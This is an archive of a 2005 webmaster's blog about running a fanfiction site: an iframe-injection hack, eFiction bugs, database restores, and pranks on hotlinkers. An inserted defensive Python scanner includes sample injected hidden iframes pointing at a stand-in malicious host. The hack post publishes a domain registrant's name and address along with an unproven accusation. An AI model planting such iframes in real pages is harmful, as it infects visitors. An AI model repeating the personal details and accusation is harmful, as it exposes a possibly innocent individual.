
Alden Bates' Weblog

Website Management Archives


December 11, 2005

Outing scumbags

OK, a scant couple of days after we upgraded Teaspoon to a more secure version of eFiction, we were hacked into. The hackers used an exploit in eFiction to break in and add some code to one of the files. I have patched the exploit in the version of eFiction on our site, and notified the eFiction authors.

The hacker (who had a Russian IP address) changed a file to insert a 1x1 iframe on every page on the site. The URL they used was malformed and didn't work, but would have pointed at iframebiz.biz, which tried to load a Trojan onto the target's PC.

The registration info on iframebiz.biz is:
Ezhi Brozkevitsh
Al. Armii Ludowej 24
Warszawa 00-609
Poland
+21.225798***

I'm presuming he pays hackers to put code onto sites so he can infect PCs for whatever nefarious purpose.

Edit: the eFiction authors have already issued a security patch. :)
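The following is an added example, not part of the original post or of eFiction: a Python scanner that looks through a site's files for the kind of injection described above, an invisible (1x1 or CSS-hidden) iframe pointing off-site. The host names, the sample template and the list of file suffixes are constructed assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name=value; the optional backslash copes with \" inside PHP echo strings
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*\\?(?:"([^"\\]*)|'([^'\\]*)|([^\s"'>\\]+))""")
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|"
                           r"\b(?:width|height)\s*:\s*[01](?:px)?\s*(?:;|$)", re.I)
PLAIN_RELATIVE_RE = re.compile(r"(?!.*//)[\w./?=&%#-]*")  # same-site path, no host part
SCAN_SUFFIXES = {".php", ".inc", ".html", ".htm", ".tpl", ".js"}  # assumed file types

# Constructed sample: one template with benign frames (lines 2-3) and injected ones (4-5).
SAMPLE = r'''<?php include "header.php"; ?>
<iframe src="http://video.example/embed/abc" width="560" height="315"></iframe>
<iframe src="/upload_target.php" style="display:none"></iframe>
<?php echo "<iframe src=\"http://malicious.example/in.php\" width=1 height=1></iframe>"; ?>
<iframe src="http//malicious.example/in.php" style="width:0;height:0"></iframe>
'''


def hidden_reasons(attrs):
    """Why a frame is invisible to the visitor (empty list if it is not)."""
    reasons = [f"{dim}={attrs[dim]}" for dim in ("width", "height")
               if re.fullmatch(r"[01](px)?", attrs.get(dim, "").strip())]
    if HIDDEN_CSS_RE.search(attrs.get("style", "")):
        reasons.append("style hides frame")
    return reasons


def find_hidden_iframes(text, own_hosts):
    """Report invisible iframes whose src is not a same-site reference."""
    findings = []
    for tag in IFRAME_RE.finditer(text):
        attrs = {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
                 for m in ATTR_RE.finditer(tag.group(0))}
        src = attrs.get("src", "")
        try:
            host = urlsplit(src).hostname
        except ValueError:
            host = None
        # No parsable host: only a plain relative path counts as local, so a
        # malformed absolute URL (the post describes one) is still reported.
        local = host in own_hosts if host else bool(PLAIN_RELATIVE_RE.fullmatch(src))
        reasons = hidden_reasons(attrs)
        if reasons and not local:
            findings.append({"line": text.count("\n", 0, tag.start()) + 1,
                             "src": src, "host": host, "reasons": reasons})
    return findings


def scan_tree(root, own_hosts):
    """Map each web file under root to its findings; files with none are omitted."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            found = find_hidden_iframes(path.read_text(errors="replace"), own_hosts)
            if found:
                hits[str(path)] = found
    return hits
```

Run `scan_tree` over the document root with the site's own host names after any upgrade or suspected break-in. Comparing the tree against a known-good copy of the application catches modified files this pattern check does not.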

Posted at 1:27 PM | Comments (0)

December 9, 2005

Converting FRM/MYD/MYI database files to SQL

As I mentioned last night, I had to restore some database files. Unfortunately the backup I'd downloaded was in a tarred/gzip file with each database table represented by three files with the extensions frm, myd and myi. After googling a bit (dear Google: please don't bother giving me "Supplemental result" listings if the target page is gone and you don't have a cache copy of it. That's just dumb.) I found that these were raw SQL database files.

The only way to restore them appeared to be to copy them directly to MySQL's data directory - the problem being that I didn't actually have access to the MySQL data directory on the web server in question. You would think, given that phpMyAdmin had given me these files as a backup, that it would have an easy way to restore them, but if it does, I couldn't find it.

The solution ended up being:

  1. Install MySQL and MySQL Administrator on my home PC.
  2. Copy the appropriate table files to the MySQL data directory.
  3. Use MySQL Administrator to make a backup in SQL format.
  4. Use the SQL script from the backup to restore the table on the web site.

Once the tables were restored, I used a couple of SQL statements to copy the data across to the appropriate table, and all was hunky dory.

Posted at 9:37 PM | Comments (0)

December 8, 2005

Upgrading to eFiction 2 (the revenge)

Some things were still broken after I did yesterday's upgrade, so I took a look tonight. Some of the fixes were easy, because they were things missing from the style template which were necessary for the new version. They'd turned out to have changed the default sort order on the story lists, which was easily fixed.

However two things weren't easily fixed: the chapter titles were gone (I presume this was a bug in the upgrade script) and the stories no longer had hit counters on them (they've been removed from the program for some unfathomable reason). Fortunately I had backups of the database, so I reimplemented hit counters, then restored the appropriate table under a new name and copied the appropriate values across.

The last step took a lot longer than it should have, for various reasons.

It was a lot of work, but hopefully people should be happier.

Posted at 10:21 PM | Comments (0)

December 7, 2005

Upgrading to eFiction 2

Tonight I spent upgrading A Teaspoon and an Open Mind to eFiction 2, because I found a post on the eFiction forum indicating that there were security holes in 1.1 which could allow people to view other users' passwords.

Looking at my previous entries on eFiction (keep in mind I'm only studying the code briefly here):

  • Fixing the Teaspoon - The disappearing help text appears to be fixed in this version, but I can't tell whether they've implemented anything to fix Mac posting.
  • eFiction sucks part 2 - I don't see any error handling for when the database is down, or when the story file is unable to be written.

Another thing I fixed a while back was the javascript on the "add story" page. There are two methods of uploading a story: write it in a textarea, or upload it as a text or html file. If you select the textarea, it disables uploading, and vice versa, but there's no way to switch, short of starting over.

At some point I will go back and reinsert my fixes... I'm sure the users will be kept busy by the many and varied new features the authors have added to the software in the meantime.

Posted at 10:05 PM | Comments (0)

October 31, 2005

eFiction sucks part 2

eFiction was inherited from the previous management of Teaspoon when it was taken over and I volunteered to act as co-techie. Unfortunately there are many places where eFiction is lacking, and one of those is error recovery.

For instance, if the SQL server is down, rather than fail gracefully, you get errors all over the site saying things like:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/whoficco/public_html/index.php on line 35

Which doesn't look very nice, and doesn't tell the user what the problem actually is. This is because there's no test to see if a database query succeeded before going ahead and using the result set.

Equally not very nice is the fact that if, when someone edits a story, eFiction can't open the file to write the changed text to, it fails silently. Yes, it discards the changes and cheerfully gives the user a "Story successfully changed!" message, despite the fact that it hasn't! As this will cause data loss, I've fixed our version to display an error message instead, so the user can at least press the back button and save their changes externally before contacting us so we can fix the problem on the server.

On a more festive note, Brad has an LJ entry going with cool pictures of Halloween pumpkins.

Posted at 6:21 PM | Comments (0)

October 5, 2005

More hotlinking for fun

I enacted my revenge against another hotlinker, but, um, given the state of her profile, I'm not sure she's going to notice.

Strike 1: green, pink and cyan(?!)
Strike 2: crappy snow javascript raining broken images on her page. WTF?
Strike 3: strikethrough. Yes, every piece of text on that page has the strikethrough attribute applied.

Oh, and in IE it has a badly drawn pink sun cursor, and bright pink scroll bars.

WTF?! Get off my Internets!

Posted at 8:09 PM | Comments (0)

September 28, 2005

Time to get annoying (or, Why hotlinking is dangerous)

A while back, someone on myspace.com hotlinked to the wee image on my Dead Can Dance page, a nice gothic picture of some arched windows. Since they were so kind as to use my bandwidth to decorate their profile page, I put in a redirection, so people see the somewhat nicer animated picture on the Spice Girls page instead, because everyone needs more Spice Girls. For some reason this person changed to hotlinking to another image on my site, so I redirected that one to the Spice Girls image too. They still have the Spice Girls picture on their profile, so they must be a fan after all.

But I grow bored. They didn't specify any width/height attributes when they hotlinked, so when the browser shows the page, it displays the graphic at full size. That means I can, say, redirect it to an image which is 5120 pixels wide and 1 pixel high, and suddenly their nice layout is alllllllll screwed up. But I wouldn't do that, would I? No, I'm a nice person... Oh, wait, I just did.

Bwahahahaha!

Posted at 6:38 PM | Comments (1) | TrackBack (1)

August 30, 2005

More fallout from MT 3.2 upgrade

I had to fix two more problems that the MT 3.2 upgrade caused:

1. MTBlacklist no longer seemed to be working with 3.2, so I unloaded it and loaded on the supplied copy of SpamLookup. MTBlacklist's final score was 4380 spams blocked - I'm sure this would have been in the tens of thousands had I not been blocking at the .htaccess level. Hopefully SpamLookup will be as proficient.

2. I was using something along the lines of <MTEntryTitle dirify="1"> to generate the filename for individual entries. Unfortunately with 3.2 the dirify argument (which turns the title into a filename) seems to have stopped regarding '-' as a legal character for filenames, so (for instance) my entry formerly filenamed "stargate_sg-1.html" became "stargate_sg1.html" instead. Am now using the entry_basename as the filename instead, having corrected the entry_basenames for the existing entries to match their current filenames.

*cough* All go now. :P

Posted at 10:50 PM | Comments (0)

Interesting discovery of the day

If a page has a <link rel="next"> tag, FireFox 1.0.6 will prefetch the "next" page on the assumption the user is likely to go there next. In other words, it's treated in the same way as the <link rel="prefetch">.

This is actually in the Link Prefetching FAQ, as I found while googling for more info. I already knew about the "prefetch" link tag, but not the "next" one.

That's all very interesting, since it means if we include "next" tags on chapters in stories when we revamp Teaspoon, FireFox browsers will prefetch the next chapter. On the one hand, it means the next chapter will load faster for the readers, on the other it means if they don't like chapter 1, FireFox will cache chapter 2 unnecessarily. If we switch to static pages, that might not be an issue.

Posted at 6:52 PM | Comments (0)

August 26, 2005

Fixing the Teaspoon

A while back I volunteered to help in the technical side of running A Teaspoon and an Open Mind, a Doctor Who fanfiction site. The site's currently using the eFiction CMS, though Barbarella (the other technical admin) and I will be writing a new CMS as eFiction is not great. Bugs fixed so far:

1. Disappearing Help text
Most of the text on the help page disappeared. The problem turned out to be because the text had < symbols in it, and when the help text was edited in the eFiction settings, either the browser or eFiction would cut the text off at that point. The solution was to double escape the tag to &amp;lt;

2. Broken Mac posting
A user posting from a Mac said that their paragraph breaks were being lost and their stories appearing on the site as one huge lump of text. This was likely to be because the Apple line uses a different byte to signify the end of line, so the solution was simply to convert the end-of-lines to Unix format.

The last item is less a bug than an annoyance. PHP likes appending huge session IDs to the links on the site, so you end up with a hugely long URL with a PHPSESSID thing on the end of it. This causes many problems, including messing up the site's indexing in search engines - because the spiders get a different PHPSESSID each time, they keep indexing the same page over and over. The solution to the ID problem is three lines of code which go in the .htaccess file. Excellent.

That may still not fix the site's indexing in Google because Google is apparently wary of parameters called "sid", and eFiction uses "sid=#####" to select the story to display. It also uses exactly the same title on every single page (the site's name and slogan) which I'm sure doesn't help either.

Posted at 8:16 PM | Comments (0)

August 23, 2005

Open Letter

Dear myspace.com users.

My site is not your private image hosting server. Please do not remote link to my images. Thank you.

Yours in crankiness,
Alden (Do I have to put "please do not remote link" in every piece of alt text?)

Posted at 8:28 PM | Comments (2)

August 17, 2005

Search Engine Update

You may remember a while back, I posted about how Yahoo hadn't indexed the NZDWFC subdomain very well. I said I'd update with the results in a few months but, um, I forgot.

The results are that the number of pages from the subdomain listed in the Yahoo index has gone from 5 to over a thousand (about 1630, Yahoo reports). This is good. There were only about 2300 redirects last month, as opposed to 4600 in August last year, 432 of last month's resulting from Slurp (Yahoo's web spider) and 140 of them from people searching on Yahoo for stuff. Reducing these values to 0 is impossible, because Yahoo strips the trailing / off URLs, meaning they will always link to (for instance) http://www.tetrap.com/lj instead of http://www.tetrap.com/lj/ and thus causing an unnecessary redirect.

And I see they finally caught up with my music subdomain.

Of course, other than the trailing / problem, Yahoo seems to be indexing a lot better than they were last year. And they recently announced they had something like 20 billion pages in their index.

OTOH, the www.doctorwho.org.nz domain which points to the NZDWFC site used to show up in Google's NZ index but doesn't any more. I think this is because the domain registration company switched it from doing a permanent redirect to bringing up a page with a meta refresh on it. I have now pointed the domain directly at tetrap.com and I'm doing the redirect myself, so hopefully the NZ domain will reappear in Google's NZ index...

Posted at 8:44 PM | Comments (0)

August 2, 2005

Hosting history of Tetrapyriarbus

I posted this to my LiveJournal at the beginning of 2004 when I switched web hosts, but I thought I'd update it here...

Sometime prior to June 1996 - Planet FreeNZ
I'm not 100% sure about the month. That's the date of the earliest posting of mine I could find on Google Groups which mentioned the URL. During this period I created the Mel Bush page (the first major part of the site), and then TSV Editor Paul Scoones was so impressed with it he asked me to make the NZDWFC page as well.
Oct 1996 - First Doctor Who Web Guide to mention my site. Actually here's the first Web Guide from December 1995!
URL: http://www.wn.planet.gen.nz/~bates/
Mar 1998 - IHUG
Moved to IHUG and my site moved with me. It expanded a bit during this time, but not a huge amount because it was an ISP page and therefore there wasn't a lot of disk space provided.
URL: http://homepages.ihug.co.nz/~abates/
30 Aug 1998 - tetrap.simplenet.com
This was the first time I bought hosting. Simplenet was a very good web host at the time, though they didn't have Perl, but offered MIVAscript for creating dynamic web pages. It worked quite well. They were recommended to me by Jason Fraser who had his site on there as varos.simplenet.com.
(The simplenet URL first appeared in the 18 September 1998 Doctor Who Web Guide.)
URL: http://tetrap.simplenet.com/
20 Jan 2000 - tetrap.com registered
Due to the impending buying out of Simplenet by Yahoo, as Yahoo were going to scrap the xxxx.simplenet.com subdomains.
Feb 2000 - Simplenet swallowed by Yahoo
Unfortunately from there the service went downhill, with the MIVA server going down, disk space reduced to 100MB, and eventually Yahoo announced they were going to scrap SSI which my site made (and still makes) heavy use of. I therefore opted to jump ship.
20 July 2001 - switched to CIHost
Worst decision I made. Lots of site slowness and unexplained downtime. Unfortunately I signed up for a year in advance. When July 2002 rolled around again, they charged my credit card without asking me. Despite canceling, it took them several months to give me my money back. The only good thing about this period is that CIHost supported both MIVA and perl, so I was able to convert my miva scripts into perl.
6 Aug 2002 - switched to Sectorlink
Sectorlink were pretty good. Anything was a step up after CIHost, but there were niggly little things that annoyed me. Mainly to do with the site statistics system (ISTR this was the monthly reports I was supposed to be emailed not turning up or turning up months late).
6 Jan 2004 - switched to HostForWeb
HostForWeb have been pretty good. Their control panel and stats are pretty good, I can download the raw access logs, and their technical support is prompt. The only thing I think they need to work on (and this has been a problem all along) is that they rarely announce scheduled down-time, thus occasionally I'll find my site is down, report it, and be told that they're doing a server upgrade. Other than that, they're a pretty darn good web host.

I'm working by the assumption that Tetrapyriarbus started in June 1996, so the site is currently nine years old. That's 90 in Internet years. :)

The name, incidentally, was due to the fact that many other Doctor Who sites took their names from planets from the show, usually something like "Frontios" (there were about three web sites named Frontios at the time, ISTR...) and so I picked a planet name from Time and the Rani.

Posted at 10:47 PM | Comments (0)

July 2, 2005

The State of the Tetrap

Most of the traffic to the main part of my site, the www part, seems to be coming at the moment from people looking for LiveJournal icons. I can't think why that would be. :P Also, people really dig the Dalek mood icons. I still prefer the K9 icons, myself. But, like, the average hits to my site keeps going up by the week.

When I started on Host For Web in January '04, my site was using around 1.5GB per month. It's currently eating through 4GB per month... Fortunately my account allows for up to 50GB per month.

My favourite spammers, the Bulgarians, switched from comment spam attempts to trackback spam attempts. They didn't notice when I renamed the trackback script and blocked all access attempts to the old one. Apparently they've given up as of the 29th, and I've had very few spam attempts since.

Sadly I think most of the people who googled in to the second item were wanting to build a real one, and #1 is probably people searching for info on the new series. :P June also saw record traffic to the NZDWFC pages due mostly to the build-up to the Prime screenings, and the exposure this got the site in places like This Week in Doctor Who, which is posted to the newsgroup and several high-profile Who sites. Also the Prime Press Pack went up fairly late in the month, but still managed to get into the top 25 pages with some 143 hits. Himpressive.

Moby and Daft Punk both released new albums recently, and Mike and Enya are both working on new ones. Enigma is... well, who knows? Hopefully his next album won't have the same copy protection that stops me being able to play Voyageur (See also Hotel). Likewise, what Era are up to is not obvious from their Flashturbated site, which is still merrily promoting their 2003 album.

Posted at 3:35 PM | Comments (0)

June 26, 2005

Borked: My Yahoo!

[snapshot of Yahoo! Briefcase]

Along the lines of This is Broken: For as long as I've been using Yahoo! Briefcase, I've had the Briefcase status box on my My Yahoo! page. And for as long as I've had that box there, it has always displayed the same message: "Problem retrieving your personal information. Please try again later."

Clicking on "try again" doesn't do anything, so far as I can see...

Hell, that's not the only thing that's broken on Yahoo! I have the login expiry on Yahoo! mail set to 24 hours. This used to mean after 24 hours, I would have to re-enter my password to get back in. Apparently they have changed this. Now the routine is:

  1. I'm prompted to enter my password, which I do.
  2. I'm prompted to re-enter my user name, password, type in the text from a graphic, tick the "Remember my ID on this computer" (again).

However, at screen 1, I can hit the "sign in as a different user" link, and I'm taken to a screen where I'm prompted to re-enter my user name, password, and tick the "Remember my ID on this computer" - I.E. the second screen above except with no graphic. This doesn't make much sense to me at all - why have a device to stop robots from logging in if it's so easily circumvented? It just makes it harder for me, as a human, to use my Yahoo! mail...

Edit: Right as I was posting this, I went to add a file to my briefcase. There were two buttons at the bottom of the page:

[Cancel][Cancel]

So which one do I press?! (It's the one on the left, but you have to look at the source to find that out...)

Posted at 1:51 PM | Comments (0)
